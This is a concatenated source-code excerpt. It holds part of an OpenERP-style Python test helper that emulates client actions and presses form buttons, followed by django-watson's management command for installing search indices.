view_id = action['views'][0][0]
datas['view_mode']= action['views'][0][1]
else:
if action.get('view_id', False):
view_id = action['view_id'][0]
elif action.get('view_id', False):
view_id = action['view_id'][0]
assert datas['res_model'], "Cannot use the view without a model"
# Here, we have a view that we need to emulate
log_test("will emulate a %s view: %s#%s",
action['view_type'], datas['res_model'], view_id or '?')
view_res = registry[datas['res_model']].fields_view_get(cr, uid, view_id, action['view_type'], context)
assert view_res and view_res.get('arch'), "Did not return any arch for the view"
view_data = {}
if view_res.get('fields',{}).keys():
view_data = registry[datas['res_model']].default_get(cr, uid, view_res['fields'].keys(), context)
if datas.get('form'):
view_data.update(datas.get('form'))
if wiz_data:
view_data.update(wiz_data)
_logger.debug("View data is: %r", view_data)
for fk, field in view_res.get('fields',{}).items():
# Default fields returns list of int, while at create()
# we need to send a [(6,0,[int,..])]
if field['type'] in ('one2many', 'many2many') \
and view_data.get(fk, False) \
and isinstance(view_data[fk], list) \
and not isinstance(view_data[fk][0], tuple) :
view_data[fk] = [(6, 0, view_data[fk])]
action_name = action.get('name')
try:
from xml.dom import minidom
cancel_found = False
buttons = []
dom_doc = minidom.parseString(view_res['arch'])
if not action_name:
action_name = dom_doc.documentElement.getAttribute('name')
for button in dom_doc.getElementsByTagName('button'):
button_weight = 0
if button.getAttribute('special') == 'cancel':
cancel_found = True
continue
if button.getAttribute('icon') == 'gtk-cancel':
cancel_found = True
continue
if button.getAttribute('default_focus') == '1':
button_weight += 20
if button.getAttribute('string') in wiz_buttons:
button_weight += 30
elif button.getAttribute('icon') in wiz_buttons:
button_weight += 10
string = button.getAttribute('string') or '?%s' % len(buttons)
buttons.append( { 'name': button.getAttribute('name'),
'string': string,
'type': button.getAttribute('type'),
'weight': button_weight,
})
except Exception, e:
_logger.warning("Cannot resolve the view arch and locate the buttons!", exc_info=True)
raise AssertionError(e.args[0])
if not datas['res_id']:
# it is probably an orm_memory object, we need to create
# an instance
datas['res_id'] = registry[datas['res_model']].create(cr, uid, view_data, context)
if not buttons:
raise AssertionError("view form doesn't have any buttons to press!")
buttons.sort(key=lambda b: b['weight'])
_logger.debug('Buttons are: %s', ', '.join([ '%s: %d' % (b['string'], b['weight']) for b in buttons]))
res = None
while buttons and not res:
b = buttons.pop()
log_test("in the \"%s\" form, I will press the \"%s\" button.", action_name, b['string'])
if not b['type']:
log_test("the \"%s\" button has no type, cannot use it", b['string'])
continue
if b['type'] == 'object':
#there we are! press the button!
fn = getattr(registry[datas['res_model']], b['name'])
if not fn:
_logger.error("The %s model doesn't have a %s attribute!", datas['res_model'], b['name'])
continue
res = fn(cr, uid, [datas['res_id'],], context)
break
else:
_logger.warning("in the \"%s\" form, the \"%s\" button has unknown type %s",
action_name, b['string'], b['type'])
return res
elif action['type']=='ir.actions.report.xml':
if 'window' in datas:
del datas['window']
if not datas:
datas = action.get('datas')
if not datas:
datas = action.get('data')
datas = datas.copy()
ids = datas.get('ids')
if 'ids' in datas:
del datas['ids']
res = try_report(cr, uid, 'report.'+action['report_name'], ids, datas, context, our_module=our_module)
return res
else:
raise Exception("Cannot handle action of type %s" % act_model)
log_test("will be using %s action %s #%d", act_model, act_xmlid, act_id)
action = registry[act_model].read(cr, uid, [act_id], context=context)[0]
assert action, "Could not read action %s[%s]" %(act_model, act_id)
loop = 0
while action:
loop += 1
# This part tries to emulate the loop of the Gtk client
if loop > 100:
_logger.error("Passed %d loops, giving up", loop)
raise Exception("Too many loops at action")
log_test("it is an %s action at loop #%d", action.get('type', 'unknown'), loop)
result = _exec_action(action, datas, context)
if not isinstance(result, dict):
break
datas = result.get('datas', {})
if datas:
del result['datas']
action = result
return True
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
samuelcolvin/django-watson | refs/heads/master | src/watson/management/commands/installwatson.py | 5 | """Creates the database indices needed by django-watson."""
from __future__ import unicode_literals
from django.core.management.base import NoArgsCommand
from watson.registration import get_backend
class Command(NoArgsCommand):
help = "Creates the database indices needed by django-watson."
def handle_noargs(self, **options):
"""Runs the management command."""
verbosity = int(options.get("verbosity", 1))
backend = get_backend()
if not backend.requires_installation:
if verbosity >= 2:
self.stdout.write("Your search backend does not require installation.\n")
elif backend.is_installed():
if verbosity >= 2:
self.stdout.write("django-watson is already installed.\n")
else:
backend.do_install()
if verbosity >= 2:
self.stdout.write("django-watson has been successfully installed.\n")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.